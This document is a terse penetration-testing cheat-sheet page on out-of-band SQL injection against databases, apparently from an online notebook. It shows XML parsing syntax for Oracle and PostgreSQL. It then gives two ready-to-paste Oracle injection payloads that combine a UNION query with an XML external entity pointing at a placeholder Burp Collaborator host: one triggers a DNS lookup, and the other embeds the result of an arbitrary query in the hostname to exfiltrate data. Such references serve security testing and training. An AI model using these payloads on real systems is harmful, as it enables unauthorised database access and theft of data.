# Out-Of-Band

## Synthaxe XML integration

<table><thead><tr><th></th><th></th></tr></thead><tbody><tr><td>Oracle</td><td><pre><code>SELECT XMLTYPE('&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>') 
FROM dual;
</code></pre></td></tr><tr><td>PostgreSQL</td><td><pre><code>SELECT XMLPARSE(DOCUMENT '&#x3C;?xml version="1.0"?>&#x3C;document>&#x3C;employee>John&#x3C;/employee>&#x3C;/document>');
</code></pre></td></tr></tbody></table>

## Simple DNS lookup

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

## Data exfiltration

```sql
' UNION SELECT EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(<SQL_QUERY_HERE>)||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l') FROM dual--
```

<figure><img src="https://3571537825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOIXudYEdnnE8JjXBrL0o%2Fuploads%2FOb3FlGs42GB0cNwUZnDV%2Fimage.png?alt=media&#x26;token=4a9756d4-6e08-44b1-831e-270f2de29848" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3571537825-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOIXudYEdnnE8JjXBrL0o%2Fuploads%2FbHyNmPFO1PW4LY3MHoc1%2Fimage.png?alt=media&#x26;token=c3e4651e-dc93-4ac2-ab1c-497070e6dcae" alt=""><figcaption></figcaption></figure>